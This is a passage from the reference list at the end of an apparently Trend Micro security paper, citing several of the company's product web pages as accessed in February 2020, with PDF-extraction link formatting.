February 2020 at https://](https://www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html) [www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html.](https://www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html) [34 Trend Micro Incorporated. (n.d.). Trend Micro. “Hybrid Cloud Security.” Last accessed on 6 February 2020 at https://www.](https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html) [trendmicro.com/en_us/business/products/hybrid-cloud.html.](https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html) [35 Trend Micro Incorporated. (n.d.). Trend Micro. “Smart Protection Suites.” Last accessed on 6 February 2020 at https://www.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [trendmicro.com/en_us/business/products/user-protection/sps.html.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [36 Trend Micro Incorporated. (n.d.). Trend Micro. “All Solutions.” Last accessed on 6 February 2020 at https://www.trendmicro.](https://www.trendmicro.com/en_us/business/products/all-solutions.html) [com/en_us/business/products/all-solutions.html.](https://www.trendmicro.com/en_us/business/products/all-solutions.html) [37 Trend Micro Incorporated. (n.d.). Trend Micro. “Smart Protection Suites.” Last accessed on 6 February 2020 at https://www.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [trendmicro.com/en_us/business/products/user-protection/sps.html.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) ----- -----